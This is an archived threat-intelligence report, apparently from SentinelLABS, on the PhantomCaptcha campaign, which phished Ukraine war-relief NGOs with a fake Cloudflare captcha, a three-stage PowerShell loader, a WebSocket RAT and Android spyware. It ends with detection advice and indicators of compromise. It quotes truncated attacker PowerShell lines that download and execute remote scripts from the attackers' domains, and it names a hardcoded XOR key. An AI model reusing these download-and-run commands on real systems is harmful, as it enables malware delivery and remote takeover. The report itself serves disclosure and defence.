{
	"id": "3b1c53cd-0c15-4891-902f-92b197782980",
	"created_at": "2026-04-06T00:08:50.653864Z",
	"updated_at": "2026-04-10T03:34:43.794638Z",
	"deleted_at": null,
	"sha1_hash": "c1c565ff69ab040ff11e458bd7db382739194105",
	"title": "PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5133193,
	"plain_text": "PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine\r\nin Single-Day Spearphishing Operation\r\nBy Tom Hegel\r\nPublished: 2025-10-22 · Archived: 2026-04-05 21:32:11 UTC\r\nExecutive Summary\r\nSentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing\r\ncampaign targeting individual members of the International Red Cross, Norwegian Refugee Council,\r\nUNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government\r\nadministration.\r\nThreat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs,\r\nluring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.\r\nThe final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary\r\nremote command execution, data exfiltration, and potential deployment of additional malware.\r\nDespite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating\r\nsophisticated planning and strong commitment to operational security.\r\nAn additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at\r\ncollecting geolocation, contacts, media files and other data from compromised Android devices.\r\nBackground\r\nFollowing intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an\r\ninvestigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations\r\ncritical to Ukraine’s war relief efforts.\r\nThe campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a\r\nweaponized PDF attachment (SHA-256:\r\ne8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3 ) embedded with a malicious link.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 1 of 
13\r\nPDF document page 1/8\r\nTargeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s Fund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk regions.\r\nThe weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique.\r\nVirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the campaign.\r\nPhantomCaptcha Attack Chain\r\nThe PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust and bypass traditional security controls.\r\nOpening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app, a domain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned by Russian provider KVMKA.\r\nOur analysis showed that zoomconference[.]app, hosted on IP 193.233.23[.]81, stopped resolving on the same day the attack attempt took place, indicating a single-day operation. However, we were able to retrieve the server response from a record captured on VirusTotal. The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway.\r\nInitial view of a page from zoomconference[.]app\r\nAfter loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server, passing a randomly generated client identifier, clientId, produced by an embedded JavaScript function generateRandomId(). 
A JavaScript comment before the function suggests the client identifier should be 32 characters long; however, the code utilizes only 2 characters for clientId.\r\nThe attack infrastructure supported two potential infection paths. If the WebSocket server responded with a matching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This infection path likely enabled live social engineering calls with victims; however, activation of this path was not observed during our investigation.\r\nThe primary infection vector relied on a variation of a social engineering technique that has been widely deployed by a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target to execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha variant of this technique works as follows.\r\nAfter the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge displaying an “I’m not a robot” checkbox.\r\nSimulated reCaptcha controls\r\nClicking the checkbox triggers a popup with instructions in Ukrainian, directing users to:\r\n1. Click the “Copy token” button in the popup\r\n2. Press Windows + R to open the Run dialog\r\n3. 
Paste and execute the command\r\nCustom reCaptcha popup in Ukrainian with “Copy token” button\r\nThe button runs a function copyToken() which contains a PowerShell commandlet designed to run invisibly.\r\nfunction copyToken(){\r\n//--headless \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -\r\nlet code = `iex ((New-Object System.Net.WebClient).DownloadString(\\\\\"ht\\\\\"+\\\\\"tps://zoomconference.a\\\r\nnavigator.clipboard.writeText(\"conhost.exe --headless \\\"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1\r\n}\r\nThe code downloads and executes the next stage PowerShell script from hxxps://zoomconference[.]app/cptch/${clientId}, where ${clientId} is the same ID as described above.\r\nThis social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.\r\nInfection paths\r\nOur analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a Russian FSB-linked threat cluster, by several industry peers [1, 2, 3]. 
We continue to investigate whether this attribution can be confidently extended to the PhantomCaptcha campaign.\r\nMulti-Stage Payload Delivery\r\nAlthough the malware distribution server at zoomconference[.]app was not available at the time of analysis, we managed to discover additional infrastructure and payloads from malware repositories by querying for files from URLs ending with /cptch.\r\nOur analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.\r\nStage 1: Obfuscated Downloader\r\nThe initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44) was a heavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent complexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from hxxps://bsnowcommunications[.]com/maintenance.\r\nThe cptch file is a heavily obfuscated PowerShell script\r\nThe entire inflated script can be reduced to a single line:\r\n\u0026 ([ScriptBlock]::Create( (New-Object System.Net.WebClient).DownloadString(\"hxxps://bsnowcommunicatio\r\nUsing massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection and complicate analysis efforts.\r\nStage 2: Fingerprinting and Encrypted Comms\r\nThe second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566) is named maintenance and performs system reconnaissance, collecting:\r\nComputer name\r\nDomain information\r\nUsername\r\nProcess ID\r\nSystem UUID (hardware identifier)\r\nThis data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to hxxps://bsnowcommunications[.]com/maintenance/\u003cdata\u003e via HTTP GET 
requests.\r\nPart of the maintenance script and the hardcoded XOR key used for encryption\r\nThe script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis.\r\nThe server responded with an encrypted payload containing the third and final stage, which was decrypted and executed in memory.\r\nStage 3: WebSocket-Based Remote Access Trojan\r\nThe final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23) is a lightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at wss://bsnowcommunications[.]com:80. It receives Base64-encoded JSON messages that contain one of:\r\nAfter execution, the script collects output, the current working directory, the machine HWID (UUID via WMI), PID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket. It is designed to run in an infinite loop, with reconnect logic and basic error handling.\r\nThe WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host.\r\nInfrastructure Analysis\r\nPhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2 domain zoomconference[.]app resolved to 193.233.23[.]81, a VPS server hosted by Russian provider KVMKA. 
SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8, 2025, with ports 443 and 80 closed by the time of our investigation.\r\nBy fingerprinting the cached server response, we were able to identify a further malicious IP address, 45.15.156[.]24, to which goodhillsenterprise[.]com resolves and which has previously been seen serving obfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is currently or has recently been under the control of the threat actors behind PhantomCaptcha.\r\nThe C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131. Unlike the public-facing lure domain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.\r\nWe also found that on October 9, 2025, the day after the initial attack, a domain with the name zoomconference[.]click was registered, potentially indicating plans for continued operations.\r\nPhantomCaptcha 2025 Attack Timeline\r\nMarch – According to the earliest related event (registration of goodhillsenterprise[.]com), the attackers started their operations on 2025-03-27.\r\nJuly – A number of malicious PowerShell scripts and other malware samples were developed and tested on VirusTotal in July 2025.\r\nSeptember – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep 25, 2025.\r\nOctober – Internal timestamps from the lure PDF document are dated back to Aug 2025, but were updated on Oct 8, 2025. The email with the malicious attachment was also sent out on Oct 8, 2025. 
On the same day, the attack domain was shut down only to appear the following day (Oct 9, 2025) under a different top-level domain.\r\nPivot to Additional Campaign\r\nOne interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development.\r\nAs noted earlier, the PhantomCaptcha Zoom-themed domains were hosted on 193.233.23[.]81. During our analysis, the same IP began hosting a new domain, princess-mens[.]click, which appeared similar in ownership and configuration. Collected HTTPS response data from zoomconference[.]click also began including content identical to that found in the new domain, indicating a direct overlap in ownership of both domains.\r\nDomain timeline, focused on October and later, on 193.233.23[.]81\r\nzoomconference[.]click HTTPS response data matching princess-mens[.]click\r\nThe princess-mens[.]click domain has been observed linked to an Android application called princess.apk, hosted at https://princess-mens[.]click/princess.apk. The domain’s content and the APK are themed around an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other themes as well, such as “Cloud Storage”.\r\nApp requesting device location\r\nThe application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various server paths such as /check_update, /data, and /upload. 
For example:\r\nThe APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device information. Based on the variable names in the code, the specific data being collected appears to be as follows.\r\nContacts data: phonebook entries (names, numbers, emails).\r\nCall logs: incoming, outgoing, and missed calls.\r\nInstalled apps: list of all installed applications.\r\nSIM numbers/data: SIM card information such as numbers, IMSI, or carrier details.\r\nDevice info: hardware model, OS version, manufacturer, and possibly device ID.\r\nNetwork info: connected network type (Wi-Fi, mobile, etc).\r\nWi-Fi SSID: name of the currently connected Wi-Fi network.\r\nLocation data: GPS or last known location of the device.\r\nPublic IP address: external IP visible to the internet.\r\nGallery images: photos or image metadata stored on the device.\r\nWhile these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as a separate cluster of activity and encourage the research community to further pursue this lead for additional insight. We provide indicators that may be fruitful to explore at the end of this post.\r\nSecurity Implications\r\nLegitimate services do not require pasting commands into the Windows Run dialog (Win+R) or similar interfaces. Hence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using this infection vector. 
Similarly, unexpected communications from government offices can be independently verified through known channels.\r\nFrom a technical perspective, PowerShell execution logging and monitoring provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging. Additionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious domains, particularly those mimicking legitimate services.\r\nWe provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection efforts.\r\nConclusion\r\nThe PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.\r\nThe targeting of organizations supporting Ukraine’s relief efforts also reveals an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts.\r\nSentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as new information becomes available.\r\nAcknowledgments\r\nWe would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine, for their invaluable collaboration on this case.\r\nOrganizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via 
ThreatTips@sentinelone.com.\r\nIndicators of Compromise\r\nPhantomCaptcha\r\nDomains\r\nbsnowcommunications[.]com\r\ngoodhillsenterprise[.]com\r\nlapas[.]live\r\nzoomconference[.]app\r\nzoomconference[.]click\r\nIP Addresses\r\n45.15.156[.]24\r\n185.142.33[.]131\r\n193.233.23[.]81\r\nAdditional Indicators | Android Malware\r\nDomains\r\nprincess-mens[.]click\r\nprincess-mens-club[.]com\r\nIP Addresses\r\n91.149.253[.]99\r\n91.149.253[.]134\r\n167.17.188[.]244\r\nHashes (SHA-256)\r\n07d9deaace25d90fc91b31849dfc12b2fc3ac5ca90e317cfa165fe1d3553eead (Cloud Storage)\r\n55677db95eb5ddcca47394d188610029f06101ee7d1d8e63d9444c9c5cb04ae1 (princess.apk)\r\nb02d8f8cf57abdc92b3af2545f1e46f1813f192f4a200a3de102fd38cf048517 (princess.apk)\r\nbcb9e99021f88b9720a667d737a3ddd7d5b9f963ac3cae6d26e74701e406dcdc (princess.apk)\r\nSource: https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/"
	],
	"report_names": [
		"phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation"
	],
	"threat_actors": [
		{
			"id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4",
			"created_at": "2023-01-06T13:46:38.581534Z",
			"updated_at": "2026-04-10T02:00:03.029872Z",
			"deleted_at": null,
			"main_name": "Callisto",
			"aliases": [
				"BlueCharlie",
				"Star Blizzard",
				"TAG-53",
				"Blue Callisto",
				"TA446",
				"IRON FRONTIER",
				"UNC4057",
				"COLDRIVER",
				"SEABORGIUM",
				"GOSSAMER BEAR"
			],
			"source_name": "MISPGALAXY:Callisto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aedca2f-6f6c-4470-af26-a46097d3eab5",
			"created_at": "2024-11-01T02:00:52.689773Z",
			"updated_at": "2026-04-10T02:00:05.396502Z",
			"deleted_at": null,
			"main_name": "Star Blizzard",
			"aliases": [
				"Star Blizzard",
				"SEABORGIUM",
				"Callisto Group",
				"TA446",
				"COLDRIVER"
			],
			"source_name": "MITRE:Star Blizzard",
			"tools": [
				"Spica"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a057a97-db21-4261-804b-4b071a03c124",
			"created_at": "2024-06-04T02:03:07.953282Z",
			"updated_at": "2026-04-10T02:00:03.813595Z",
			"deleted_at": null,
			"main_name": "IRON FRONTIER",
			"aliases": [
				"Blue Callisto ",
				"BlueCharlie ",
				"CALISTO ",
				"COLDRIVER ",
				"Callisto Group ",
				"GOSSAMER BEAR ",
				"SEABORGIUM ",
				"Star Blizzard ",
				"TA446 "
			],
			"source_name": "Secureworks:IRON FRONTIER",
			"tools": [
				"Evilginx2",
				"Galileo RCS",
				"SPICA"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434130,
	"ts_updated_at": 1775792083,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.pdf",
		"text": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.txt",
		"img": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.jpg"
	}
}